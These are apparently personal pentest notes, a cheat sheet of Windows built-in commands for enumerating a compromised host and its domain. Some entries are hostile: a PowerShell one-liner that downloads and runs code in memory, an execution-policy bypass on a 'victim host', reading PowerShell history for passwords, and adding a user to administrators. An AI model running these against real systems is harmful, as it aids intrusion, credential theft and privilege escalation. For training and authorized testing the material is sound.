LOLBIN Enumeration

hostname	Prints the PC's Name
[System.Environment]::OSVersion.Version	Prints out the OS version and revision level
wmic qfe get Caption,Description,HotFixID,InstalledOn	Prints the patches and hotfixes applied to the host
ipconfig /all	Prints out network adapter state and configurations
set	Displays a list of environment variables for the current session (ran from CMD-prompt)
echo %USERDOMAIN%	Displays the domain name to which the host belongs (ran from CMD-prompt)
echo %logonserver%	Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

Get-Module	Lists available modules loaded for use.
Get-ExecutionPolicy -List	Will print the execution policy settings for each scope on a host.
Set-ExecutionPolicy Bypass -Scope Process	This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt	With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
Get-ChildItem Env: | ft Key,Value	Return environment values such as key paths, users, computer information, etc.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"	This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

netsh advfirewall show allprofiles

sc query windefend

Get-MpComputerStatus

qwinsta

Networking Commands	Description
arp -a	Lists all known hosts stored in the arp table.
ipconfig /all	Prints out adapter settings for the host. We can figure out the network segment from here.
route print	Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
netsh advfirewall show state	Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

wmic qfe get Caption,Description,HotFixID,InstalledOn	Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List	Displays basic host information to include any attributes within the list
wmic process list /format:list	A listing of all processes on host
wmic ntdomain list /format:list	Displays information about the Domain and Domain Controllers
wmic useraccount list /format:list	Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list	Information about all local groups
wmic sysaccount list /format:list	Dumps information about any system accounts that are being used as service accounts.

[[WMI - Windows Management Instrumentation]] [[Enumerate WMI events]] [[WMI service creation]]

Command	Description
net accounts	Information about password requirements
net accounts /domain	Password and lockout policy
net group /domain	Information about domain groups
net group "Domain Admins" /domain	List users with domain admin privileges
net group "domain computers" /domain	List of PCs connected to the domain
net group "Domain Controllers" /domain	List PC accounts of domains controllers
net group <domain_group_name> /domain	User that belongs to the group
net groups /domain	List of domain groups
net localgroup	All available groups
net localgroup administrators /domain	List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators	Information about a group (admins)
net localgroup administrators [username] /add	Add user to administrators
net share	Check current shares
net user <ACCOUNT_NAME> /domain	Get information about a user within the domain
net user /domain	List all users of the domain
net user %username%	Information about the current user
net use x: \computer\share	Mount the share locally
net view	Get a list of computers
net view /all /domain[:domainname]	Shares on the domains
net view \computer /ALL	List shares of a computer
net view /domain	List of PCs of the domain

More here.